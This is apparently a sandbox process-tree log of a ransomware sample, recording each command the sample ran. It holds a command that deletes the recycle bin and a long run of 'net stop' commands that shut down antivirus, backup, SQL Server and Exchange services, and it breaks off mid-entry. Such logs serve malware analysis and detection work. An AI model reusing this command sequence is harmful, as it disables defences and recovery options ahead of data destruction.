- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:1164
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:1960
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:1768
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:1352
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:1752
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:844
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1964
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:1480
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:772
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:316
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:520
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:1052
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:292
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:1588
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:816
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:1536
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:1200
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:904
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:1084
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:2036
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:568
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:1744
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:1352
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:320
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:1204
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:1560
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:652
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:2296
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:968
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:2304
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:1928
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:2276
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:560
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:2288
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:1548
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:2392
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1960
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:2408
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:1772
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:2432
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:2268
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:1584
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:876
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:2312
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:1428
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:1240
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:1576
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:1784
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
    3⤵
    PID:2400
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:1616
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer /y
    3⤵
    PID:2448
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:1680
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop IISAdmin /y
    3⤵
    PID:2440
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:1576
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Sophos Agent” /y
    3⤵
    PID:2464
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:1872
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Enterprise Client Service” /y
    3⤵
    PID:2456
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:520
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “SQL Backups /y
    3⤵
    PID:2480
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:1316
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop EraserSvc11710 /y
    3⤵
    PID:2472
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:1760
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:1156
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:2416
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:1760
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSExchangeES /y
    3⤵
    PID:2424
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:1712
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:2024
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:404
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:480
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:1532
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:1540
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:780
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer100 /y
    3⤵
    PID:3260
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:1688
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop NetMsmqActivator /y
    3⤵
    PID:3476
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:1800
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SamSs /y
    3⤵
    PID:3484
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
    3⤵
    PID:3500
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:744
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSExchangeIS /y
    3⤵
    PID:3492
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:2056
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer110 /y
    3⤵
    PID:3276
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:2124
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Sophos Clean Service” /y
    3⤵
    PID:3544
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:2112
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMGMT /y
    3⤵
    PID:3448
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:2088
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop POP3Svc /y
    3⤵
    PID:3456
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:1640
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
    3⤵
    PID:3508
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:1148
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ReportServer /y
    3⤵
    PID:3284
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:2176
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SMTPSvc /y
    3⤵
    PID:3964
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:2212
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
    3⤵
    PID:3764
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:2228
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop msftesql$PROD /y
    3⤵
    PID:3824
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:2204
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:3996
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:2320
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SstpSvc /y
    3⤵
    PID:4652
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:2328
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMTA /y
    3⤵
    PID:4620
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:2336
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
    3⤵
    PID:4292
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:2488
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:6036
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:2496
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Symantec System Recovery” /y
    3⤵
    PID:5628
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:2512
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
    3⤵
    PID:5736
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:2684
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
    3⤵
    PID:6404
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:2872
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:6612
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:2888
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop msexchangeimap4 /y
    3⤵
    PID:6568
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:2880
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
    3⤵
    PID:6396
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:2768
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:6324
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:2760
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
    3⤵
    PID:6488
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:2744
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop msexchangeadtopology /y
    3⤵
    PID:6636
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:2728
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “aphidmonitorservice” /y
    3⤵
    PID:6316
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:2696
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPS /y
    3⤵
    PID:6764
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:2640
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
    3⤵
    PID:6620
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:2624
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Sophos Health Service” /y
    3⤵
    PID:6628
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:2608
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:5348
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:2600
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop W3Svc /y
    3⤵
    PID:5852
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:2592
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:6504
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:2576
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:6576
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:2560
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPS /y
    3⤵
    PID:6600
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:2552
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
    3⤵
    PID:4492
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:2544
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:6284
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:2532
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:4584
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:2936
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Client” /y
    3⤵
    PID:6772
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:2956
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    3⤵
    PID:6780
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:2964
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop unistoresvc_1af40a /y
    3⤵
    PID:2296
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:2948
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:3188
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:3020
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:5744
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Sophos Message Router” /y
    3⤵
    PID:7112
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:3068
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop audioendpointbuilder /y
    3⤵
    PID:6364
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:3060
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    3⤵
    PID:8076
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:2248
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:6032
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:2224
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
    3⤵
    PID:7216
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:2676
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
    3⤵
    PID:2304
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:2364
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:2428
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:3140
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:7120
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3172
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:7160
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:3228
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:6448
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:3252
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop EhttpSrv /y
    3⤵
    PID:7292
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:3236
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:6076
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:3212
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop DCAgent /y
    3⤵
    PID:8092
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:3332
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mozyprobackup /y
    3⤵
    PID:8032
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:3324
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ekrn /y
    3⤵
    PID:6460
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:3316
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:3288
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:3308
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MMS /y
    3⤵
    PID:1616
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:3356
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop EPSecurityService /y
    3⤵
    PID:7980
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:3348
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:7900
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:3192
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    3⤵
    PID:8236
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:3148
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:9196
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:3128
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
    3⤵
    PID:8112
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:3112
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:7684
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:3104
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Antivirus /y
    3⤵
    PID:5872
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:3088
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:8480
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:2740
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:9164
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:2996
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:9092
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:2920
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:7176
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:2796
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
    3⤵
    PID:5240
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:2668
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:2412
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:2636
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    3⤵
    PID:7192
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:2508
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:5304
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:3392
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:8052
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:3416
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:2148
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:3408
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:6480
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:3468
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop EsgShKernel /y
    3⤵
    PID:7872
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:3440
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
    3⤵
    PID:8060
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:3432
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ntrtscan /y
    3⤵
    PID:308
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:3528
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:7252
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:3668
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:8896
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:3684
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:8888
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:3676
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:8820
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:3692
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop FA_Scheduler /y
    3⤵
    PID:8760
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:3708
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:6420
- C:\Windows\SysWOW64\net.exe
